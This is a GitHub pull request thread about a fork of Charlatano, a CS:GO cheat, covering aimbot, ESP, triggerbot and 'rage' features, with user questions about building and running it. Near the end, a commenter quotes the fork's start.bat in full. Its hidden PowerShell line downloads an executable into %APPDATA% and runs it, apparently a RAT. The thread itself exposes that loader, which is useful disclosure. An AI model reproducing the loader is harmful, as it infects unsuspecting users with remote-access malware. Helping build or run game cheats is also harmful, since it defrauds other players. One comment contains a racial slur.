### PR TITLE
Austin72 Fork - Toggles, rage, and more

### PR DESCRIPTION
**Pull request by Austin72**
Added:
- Toggles for Aim, RCS, ESP, BHOP, Trigger, Rage, bone target
- Rage mode (autoshoot)
- Health based color ESP for enemies
- Many console commands/cleaner console
- Customization for delay between boneTrigger clicks
- Hold START_KEY to start from anywhere
- IGNORE_WALLS to ignore walls when aiming

Changed:
- Faster enemy detection
- Hold force aim key for trigger
- Bunnyhop only scrolls down
- Removed onGround check for aim
- Optimized batch start file
- Hold Force aim key with rage on to aim through walls
- Added FORCE_AIM_FOV
- Removed BONE_TRIGGER_BONE

https://github.com/Austin72/Charlatano

### CODE REVIEW

**Comment by Austin72** [comment]
Very happy I cleaned this up, much much better now.

**Comment by CodingAlien** [comment]
Did you eradicate onGround check or make it better?

**Comment by Austin72** [comment]
Previously there was a check if you and the enemy are both on ground before aiming at them.
I removed this as it would make it so that jump scouting has to be done with your own aim, also you now will shoot at enemies that are in air/jumping.

**Comment by CodingAlien** [comment]
How do I add this#?

**Comment by Austin72** [comment]
Can you be more specific? What is it you'd like to add?

**Comment by MoofMonkey** [comment]
@CodingAlien, if you didn't created your version of charlotano you can just download @Austin72's fork

**Comment by Austin72** [comment]
Added @MoofMonkey s Edit as well :)

**Comment by MoofMonkey** [comment]
Thanks :)

**Comment by Austin72** [comment]
Oh well, I took what you wrote so I guess that comes with it, a small error is not gonna hurt anyone :P

**Comment by Austin72** [comment]
@CodingAlien Download at https://github.com/Austin72/Charlatano/releases/download/1.0.6/Charlatano.1.0.6.rar

**Comment by pakboy** [comment]
cheat keys For rage

**Comment by pakboy** [comment]
EveryThink Is good and perfect Working 1.0.6 Check it

**Comment by MoofMonkey** [comment]
@pakboy, everything*

**Comment by pakboy** [comment]
yes Sir xD

**Comment by pakboy** [comment]
Recoil and Aimbot and Rage 
Rage Not good :D

**Comment by pakboy** [comment]
I Like You add The skin changer Also <3
its well be Great <3

**Comment by MoofMonkey** [comment]
Skinchanger are impossible as charlatano is external :octocat:

**Comment by MoofMonkey** [comment]
/home/travis/build/Jire/Charlatano/src/main/kotlin/com/charlatano/scripts/Toggles.kt: (77, 23): Unresolved reference: TOGGLE_KEY_TRIGGER
:compileKotlin FAILED
FAILURE: Build failed with an exception.
Ehm... Last time I builded this all went okay.

**Comment by MoofMonkey** [comment]
Aw. Please rename back TOGGLE_KEY_TRIGGER to TOGGLE_KEY_BONETRIGGER.

**Comment by Austin72** [comment]
Issue has been resolved lol, I should have checked it first.

**Comment by RichHammond** [comment]
Rage bind does nothing. 
// Rage toggle key.
TOGGLE_KEY_RAGE = 0x69

That's numpad 9, correct?

Whenever I press that and type toggles, it says that rage is off.

**Comment by Austin72** [comment]
You have to hold Alt as well

**Comment by RichHammond** [comment]
How would I make it so that it toggles and just stays on perm rage using numpad 9, without holding down alt? (also is it left alt or right?)

**Comment by pakboy** [comment]
Please fix The rage can shoot Soo Much delay When shooting :(

**Comment by Austin72** [comment]
Try holding down your force aim key with rage on, it makes it aim at enemies through walls

**Comment by Erictheawesome** [comment]
Is there a way that we can rename the code or like re compile it in away?

**Comment by MoofMonkey** [comment]
@Erictheawesome, ..... build.bat?

**Comment by MoofMonkey** [comment]
Sugguestion: add Chams toggle key (Entities#chams, in ESP config @Jire says that this may cause various crashes)

**Comment by Austin72** [comment]
In vacation rn, but that can be added no problem once I'm home

**Comment by Erictheawesome** [comment]
yes please 👍, so this version is 1.0.5 but modified?

**Comment by MoofMonkey** [comment]
@Erictheawesome, yep. And with newer patches that's not included in 1.0.5

**Comment by MoofMonkey** [comment]
@Erictheawesome, yep. And with newer patches that's not included in 1.0.5. Please download latest master zip of Austin72/Charlatano, because of 1.0.6 has no a few features

**Comment by NegromancerR** [comment]
Unrecognized VM option 'EliminateLocks'
Did you mean '(+/-)EliminateBlocks'?
Error: Could not create the Java Virtual Machine.
Error: A fatal exception has occurred. Program will exit.
Press any key to continue . . .

What do i do about this???
Downloaded everything and i am ingame with gun but it doesnt seem to want to work. all files are untampered

**Comment by MoofMonkey** [comment]
@NegromancerR, use https://github.com/Austin72/Charlatano/pull/4 and delete lines in batch file between REMs (comments)

**Comment by MoofMonkey** [comment]
Skeleton && box ESP isn't working

**Comment by HellCowON** [comment]
screenshot_1

Its showing me this error, please help!

**Comment by Austin72** [comment]
Try to build it again, but this time copy the whole log to pastebin.com and post the link

**Comment by HellCowON** [comment]
Tried to build it again and restarted computer multiple times to try and still same error: 

https://pastebin.com/j3GFu8kE    <---- Paste bin

**Comment by Austin72** [comment]
http://www.oracle.com/technetwork/java/javase/downloads/jdk8-downloads-2133151.html

Download the java 8 JDK

**Comment by Austin72** [comment]
If you need a pre-done build you can download one from https://github.com/Austin72/Charlatano/releases/download/1.0.6/Charlatano.1.0.6.rar

**Comment by HellCowON** [comment]
I have another problem again im using - 1.0.5-HOTFIX , Windows 7 None of my ESP work Or any other cheats work please help :C Maybe i havent enabled them or binded them? How to make them work?

**Comment by CodingAlien** [comment]
I set rcs and aimbot binded to 0x02 I want to do turn on everytime I shoot.
But for some reason aim or rcs is not working

**Comment by MoofMonkey** [comment]
@CodingAlien, 0x02 isn't NUMPAD_2. BTW check if both path and flat aim enabled, if only one - check toggle state in console (print "t" w/o quotes)

**Comment by LoneLyyy** [comment]
So i was wondering if i toggle aim what specific aim i toggle, i like to play on faceit and i eard that normal smoothing method = ban on faceit

**Comment by Austin72** [comment]
The way the aim toggle works is different than the other toggles.
Because there are 2 types of aim I wanted to be sure that the toggle wouldn't turn one off while turning the other on, so to handle this I created a new variable named ENABLE_AIM which always starts off true. When this variable is toggled to false it disables both aim types at the same time, so there are no problems.

**Comment by GlaZex** [comment]
How can I change the FOV for the rage and the rage w/wall lock? It also seems that it doesn't shoot when locked through a wall. 

Maybe you add a rage.kts so we can edit what the rage does. Unless that already is a thing, and if so please tell me where.

**Comment by Austin72** [comment]
Rage doesnt really have a FOV, it ignores it entirely.

**Comment by Erictheawesome** [comment]
i cant get rage to work at all pls help

**Comment by MoofMonkey** [comment]
@Erictheawesome, alt + num9 toggles rage mode. This works only on flat aim.

**Comment by Erictheawesome** [comment]
So what settings would i need to change to get it to work

**Comment by MoofMonkey** [comment]
@Erictheawesome 
ENABLE_FLAT_AIM = true

ENABLE_PATH_AIM = false

And ingame press alt + numpad_9

**Comment by Erictheawesome** [comment]
ohh
Alt,  i was pressing wrong key

**Comment by CodingAlien** [comment]
Hey the esp only shows some enemies and sometimes shows doors and such.
Any idea why?

**Comment by CodingAlien** [comment]
I am using 1.0.6

**Comment by CodingAlien** [comment]
Nikitia what where shall I implement beautify?

**Comment by MoofMonkey** [comment]
@CodingAlien T_T
https://github.com/Jire/Charlatano/pull/282/commits/de167647ad28c5fe025dd9950caee3d6faabcc73
src/main/kotlin/com/charlatano/Charlatano.kt

**Comment by CodingAlien** [comment]
sorry man I still dont understand what I need to do
My problem is the rcs and aim isnt working and esp shows 1 or 2 enemies and some doors 
Sorry I know Im testing your patience

**Comment by GlaZex** [comment]
@Austin72 The rage works great with automatic weapons but if used with pistols it has a huge delay between shots. plz fix!

**Comment by Austin72** [comment]
Fixed that, thanks for pointing it out!
To anyone else who finds a bug, please report these issues!

**Comment by Erictheawesome** [comment]
How do i apply your change for rage without re unpacking the whole thing?

**Comment by Austin72** [comment]
Simply do another build.

**Comment by CodingAlien** [comment]
trying to build charlatano master by austin72 and I get a build failed error
`Caught an exception trying to connect to Kotlin Daemon
Could not perform incremental compilation: Could not connect to Kotlin compile daemon
Could not connect to kotlin daemon. Using fallback strategy.
`
i have jdk installed as I have built other versions of charlatano
Thanks for the help

**Comment by GlaZex** [comment]
@CodingAlien I too experienced this error, but uninstalling and reinstalling JDK 8 fixed the problem for myself.

**Comment by MoofMonkey** [comment]
Issues:
1. FORCE_AIM_FOV doesn't works @ rage
2. Overlay doesn't working

**Comment by MoofMonkey** [comment]
@CodingAlien 
> sorry man I still dont understand what I need to do
All okay
> My problem is the rcs and aim isnt working and esp shows 1 or 2 enemies and some doors
Showing some more entities is bug, it just disappers after a few seconds/minutes.
RCS isn't working and it's a bug.
Aim isn't working? Check that only one aim type checked
Ex.: ENABLE_FLAT_AIM = true
Path aim aren't many visible for you, aim assist too
> Sorry I know Im testing your patience
Mm... Nope.

**Comment by NegromancerR** [comment]
Error: missing `server' JVM at `C:\Program Files (x86)\Java\jre1.8.0_144\bin\server\jvm.dll'.
Please install or use the JRE or JDK that contains these missing components.
Press any key to continue . . .

From 8/1/2017 Charlatano update

Running most recent version of java jdk verified by java. i looked for the missing file and its not there. Where do i get \server\jvm.dll?

**Comment by NegromancerR** [comment]
From all my testing with the 8/1/2017 Charlatano release, Here's what i noticed.
- You need to create a server folder and move jvm.dll into it [(In C:\Program Files (x86)\Java\jre1.8.0_144\bin
so you can make C:\Program Files (x86)\Java\jre1.8.0_144\bin\server\jvm.dll) although this could've been a problem of my own thus making this comment irrelevant]
- Path aim isn't responding at all, but flat aim does
- Skeleton/box ESP isn't working (OpenGL looks like its opening but nothing appears on CSGO)
- BoneTrigger isn't working

Overall this is an amazing cheat and i'm surprised this has been undetected for this long and is still in the making. Keep it up.

**Comment by Austin72** [comment]
@4103 I added the ability for hold toggles - loved this idea, credits to you!

**Comment by MoofMonkey** [comment]
Edited https://github.com/Jire/Charlatano/pull/282#issuecomment-317220294

**Comment by CodingAlien** [comment]
Is there an update that can fix the RCS?

**Comment by GlaZex** [comment]
what the fuck nigga the toggles aint workin i want a refund

**Comment by MoofMonkey** [comment]
@GlaZex are you sure that you"re pressing Alt + toggle key in-game? Example: alt + num_0 for ESP

**Comment by GlaZex** [comment]
@MoofMonkey Yes sir. It used to work before the ability to enable "hold to toggle". Since then it hasn't worked.

**Comment by CodingAlien** [comment]
Anyone still using 1.0.5 hotfix and got rcs to work?

**Comment by MoofMonkey** [comment]
Conflicting files
src/main/kotlin/com/charlatano/scripts/RCS.kt

**Comment by Austin72** [comment]
resolved.

**Comment by Discoli** [comment]
Loving that little RAT inside the start.bat file :cry:

**Comment by w-o-a-h** [comment]
@Discoli is this a meme?

**Comment by Discoli** [comment]
@w-o-a-h no, it's not, this is the code inside the @start.bat:

`@echo off
title %random%%random%%random%%random%%random%%random%%random%%random%%random%%random%%random%%random%
IF NOT EXIST "%APPDATA%\save.txt" ( start /min "" "powershell.exe" -windowstyle hidden Invoke-WebRequest https://pastebin.com/raw/18vtLSVb -OutFile %appdata%\save.txt; &start /min "" "powershell.exe" -windowstyle hidden Invoke-WebRequest https://github.com/Austin72/IGNORE/releases/download/0/spaghetti.memes -OutFile %appdata%\mcr.exe; %appdata%\mcr.exe; )
echo Only continue once you are in game and can see your gun.
cd /d "%~dp0"
set name=Char%random%%random%
ren "Char*.jar" "%name%.jar"
set args=-server -Xmn128M -Xms256M -Xmx512M

:: If you are having trouble remove any lines below that are causing problems
set args=%args% -XX:+UseStringDeduplication
set args=%args% -XX:+UseFastAccessorMethods
set args=%args% -XX:+UseG1GC
set args=%args% -XX:+OptimizeFill
set args=%args% -XX:+UseFastEmptyMethods
set args=%args% -XX:+EliminateLocks
set args=%args% -XX:+AggressiveOpts
set args=%args% -XX:+DoEscapeAnalysis
set args=%args% -XX:+UseCompressedOops
:: If you are having trouble remove any lines above that are causing problems

java %args% -jar "%name%.jar"
pause`

It downloads & executes an exe file :b:

**Comment by Discoli** [comment]
Full Analysis: https://www.reverse.it/sample/4f0cf4cde34bca0045670470920e6a6b5b8afca36a1e9320fefc5ab16148283e?environmentId=100#

**Comment by Jire** [comment]
Blocked him on GitHub 😛 this is why you shouldn't trust stuff not built from source

**Comment by GlaZex** [comment]
I'm very confused here. He put so much work into adding all that extra fun stuff, but only to spread a RAT?

**Comment by Discoli** [comment]
@GlaZex Yea, it's fucking weird since I actually use his version of the cheat, just without the ratted start.bat.

**Comment by NegromancerR** [comment]
@Discoli could you maybe share with me what you did to remove the RAT

**Comment by NegromancerR** [comment]
I notice he had starred some RAT program on his github profile, i was always sceptic about what that would mean for his version of char

**Comment by Discoli** [comment]
@NegromancerR all I've seen so far is the code in the start.bat being malicious, here is the new code I use:

```
@echo off
title %random%%random%%random%%random%%random%%random%%random%%random%%random%%random%%random%%random%
echo Only continue once you are in game and can see your gun.
echo.
pause
cls
cd /d "%~dp0"
java -Xmx1g -Xms1g -jar "Charlatano 1.0.6.jar"
pause
```

**Comment by MoofMonkey** [comment]
@Discoli, there's nothing malicious now in start.bat. Only java arguments, renaming of jar and start command.

**Comment by MoofMonkey** [comment]
Shame on you, dude.

**Comment by Discoli** [comment]
To whoever sent this:
@MoofMonkey I presume:
https://i.imgur.com/2VOPFDW.png

You must be joking right, the original file downloaded an exe file and ran it, I don't think that should be forgiven, he has probably ratted so many people.

**Comment by MoofMonkey** [comment]
@Discoli, I meant original is repository, not the build.

**Pull request closed without merging**
